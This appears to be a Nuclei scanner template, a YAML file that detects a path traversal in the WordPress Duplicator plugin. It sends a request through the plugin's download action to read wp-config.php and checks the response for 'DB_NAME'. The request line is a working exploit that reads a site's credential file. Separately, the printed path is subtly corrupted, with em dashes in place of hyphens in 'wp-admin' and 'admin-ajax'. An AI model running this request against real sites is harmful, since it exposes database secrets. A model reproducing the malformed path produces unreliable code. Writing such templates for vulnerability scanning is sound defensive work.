nuclei-templates/vulnerabilities/wordpress-duplicator-path-t...

17 lines
355 B
YAML

id: wordpress-duplicator-path-traversal
info:
name: WordPress duplicator Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php"
matchers:
- type: word
words:
- "DB_NAME"
part: body